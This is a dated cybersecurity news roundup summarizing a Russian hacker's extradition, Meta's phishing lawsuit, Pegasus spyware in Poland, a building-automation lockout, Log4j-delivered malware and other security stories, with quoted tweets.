Justice Department Extradites Kremlin-Linked Hacker Accused of Stealing Earnings Information

Meta sues 39,000 phishing sites' operator, US and UK send cyberwarfare experts to Ukraine, NSO spyware used against top Polish opposition figures, German automation company crippled by attack, more

Dec 21, 2021

The U.S. Justice Department announced it had extradited from Switzerland a Kremlin-linked Russian national, Vladislav Klyushin, on charges that he participated in a scheme to hack and steal corporate earnings information about Tesla Inc., Roku Inc., and others, earning tens of millions of dollars in illegal profits.

Klyushin, also known as “Vladislav Kliushin,” was arrested in Sion, Switzerland on March 21, 2021, and was extradited to the United States on December 18. Klyushin was charged alongside four other Russian nationals, Ivan Ermakov, Nikolai Rumiantcev, Mikhail Vladimirovich Irzak, and Igor Sergeevich Sladkov, who remain at large. Ermakov, a former member of Russia’s military intelligence agency, was previously and separately charged with hacking crimes in 2018 in former special counsel Robert Mueller’s investigation into Russian interference in the 2016 U.S. presidential election. (Aruna Viswanatha and Dustin Volz / Wall Street Journal)

FBI @FBI

Russian national Vladislav Klyushin was extradited to the U.S. from Switzerland and is charged, along with four other Russians, for his alleged role in a global conspiracy to obtain unauthorized access to U.S. networks to commit wire and securities fraud. go.usa.gov/xetes

Assistant Special Agent in Charge Albert Murray III said, "Today’s announcement and the extradition of Vladislav Klyushin is just one more example of how the FBI and our partners are working around the clock and around the world to counter the cyber threat that we face today. As alleged, Klyushin and his co-defendants used various illegal and malicious means to gain access to computer networks to perpetrate their illegal trading scheme. These crimes have real consequences, and as our efforts in this case demonstrate, the FBI is relentless in our work to identify and locate criminals like Klyushin—no matter where they are—and bring them to the U.S. to face justice."

Meta, the parent company for Facebook, Instagram, and WhatsApp, filed a lawsuit today in a California court against the operators of more than 39,000 phishing sites hosted through the Ngrok service.

Meta seeks to obtain a court injunction and damages of at least $500,000 from the operators of these sites, even before they are identified. The suit alleges the group created phishing sites on their local systems and then used Ngrok, a localhost-to-internet relay service that allows developers to expose their local sites on the ngrok.io domain. According to the suit, the group then spread links to these ngrok.io domains to victims and collected their account credentials. (Catalin Cimpanu / The Record)

According to roughly a dozen officials, the United States and Britain have quietly dispatched cyberwarfare experts to Ukraine to prepare the country to confront cyberattacks against the electric grid, the banking system, and other critical components of Ukraine’s economy and government as Russian president Vladimir Putin plans another incursion into the country.

Officials briefed on the intelligence say that if Putin does launch a cyberattack, either as a stand-alone action or as a precursor to a physical-world attack, it will most likely come after Orthodox Christmas, at the end of the first week of January. (David E. Sanger and Julian E. Barnes / New York Times)

Horkos @ the Centre for Unilateral Analysis @WylieNewmark

It is nice to see mainstream news covering the longstanding analysis that actual cyber attacks (i.e., CNA) could be reasonably expected to be used primarily to weaken confidence in Ukraine’s government.

Julian E. Barnes @julianbarnes

NEW: Could Putin launch a cyberattack on Ukraine ahead/instead of a real-world strike? US and UK are trying to support Ukraine's cyber defenses--though plugging the holes Kyiv's systems is an impossible task. New with @SangerNYT https://t.co/CRjQdDh7FL

Researchers at the University of Toronto-based Citizen Lab confirmed that the cell phones of two top Polish opposition figures, Polish lawyer Roman Giertych and prosecutor Ewa Wrzosek, were infected by U.S.-sanctioned Israeli spyware NSO Group’s Pegasus spyware.

A Polish state security spokesperson would neither confirm nor deny whether the government ordered the hacks or is an NSO customer. Citizen Lab previously detected multiple infections in Poland dating from November 2017, although it didn’t identify individual victims then. (Frank Bajak and Vanessa Gera / Associated Press)

Related: Hamodia

John Scott-Railton @jsrailton

BREAKING: top Polish opposition figures hacked with NSO's spyware. We @citizenlab investigated & confirmed that the iPhones of of @e_wrzosek & @GiertychRoman were infected with #Pegasus. Thread 1/ By @fbajak & @VanessaGera apnews.com/article/techno…

Nathaniel Gleicher @ngleicher

Another in the long, long history of evidence of the indiscriminate targeting of journalists and opposition figures by the surveillance-for-hire industry. Thank you @jsrailton and @citizenlab for continuing to drive this!

Eva @evacide

Just in case you think NSO Group's Pegasus is only being used to target opposition figures in MENA or LatAm, here's Poland: https://t.co/pVafsSCLJb

Researchers at Limes Security say that a German automation company suddenly lost contact with hundreds of its building automation system (BAS) devices, light switches, motion detectors, shutter controllers, and others after a rare cyber attack locked the company out of the BAS it had constructed for an office building client.

The researchers discovered that three-quarters of the BAS devices in the office building network had been mysteriously purged of their operating system and applications and locked down with the system's own digital security key, which was under the attackers' control. The firm had to revert to manually flipping on and off the central circuit breakers to power on the lights in the building until Limes devised a way to recover the key. The motive behind the attack could have been a failed ransomware incident or simply cyber vandalism. (Kelly Jackson Higgins / Dark Reading)

Related: Limes Security

blake @voteblake

What a story. Building owners locked out by ‘smart’ lock system, appears to have been deliberate action

KNXlock – an attack campaign against KNX-based building automation systems – Limes Securitylimessecurity.com

French video game maker Ubisoft said that a misconfiguration in its IT infrastructure exposed gamer data for its Just Dance video game series players.

A Ubisoft spokesperson said the exposed data was limited to ‘technical identifiers,’ which include GamerTags, profile IDs, Device IDs, and Just Dance videos that were recorded and uploaded to be shared publicly with the in-game community and on users’ social media profiles. (Catalin Cimpanu / The Record)

Related: Stevivor, Ubisoft

Researchers at Cryptolaemus warned that the Log4j vulnerability is now being exploited to infect Windows devices with the Dridex Trojan and Linux devices with Meterpreter.

The threat actors use the Log4j RMI (Remote Method Invocation) exploit variant to force vulnerable devices to load and execute a Java class from an attacker-controlled remote server. Then, using Meterpreter, the threat actors can connect to the compromised Linux server and remotely execute commands to spread further on the network, steal data, or deploy ransomware. All organizations scan for vulnerable applications that use Log4j and update them to the latest versions. (Lawrence Abrams / Bleeping Computer)

Related: Venture Beat, Heimdal Security Blog

The Department of Justice announced that it had filed a civil complaint in San Diego federal court to return more than $154 million allegedly stolen from Sony Life Insurance Company Ltd, a subsidiary of Sony, by one of its employees, Rei Ishii.

The complaint alleges that Ishii embezzled funds from the company in May and diverted them to an account he controlled at a La Jolla bank. The U.S. Attorney's Office said Ishii moved the funds by falsifying transaction instructions when the Tokyo-based company attempted to transfer funds between its accounts. Law enforcement could trace Bitcoin transfers by obtaining the private key to Ishii’s bitcoin address following a joint investigation with Japan’s National Police Agency, the Tokyo Metropolitan Police Department, Tokyo District Public Prosecutors Office, and JPEC (Japan Prosecutors unit on Emerging Crimes). (City News Service)

Related: Justice Department

Bangalore, India-based Wipro announced it would acquire Austin, TX-based cybersecurity consulting company Edgile for $230 million.

The company will develop Wipro CyberTransform, an integrated suite that will help enterprises enhance boardroom governance of cybersecurity risk, in collaboration with Edgile. (Rishabh Bhatnagar / Bloomberg Quint)

Metacurity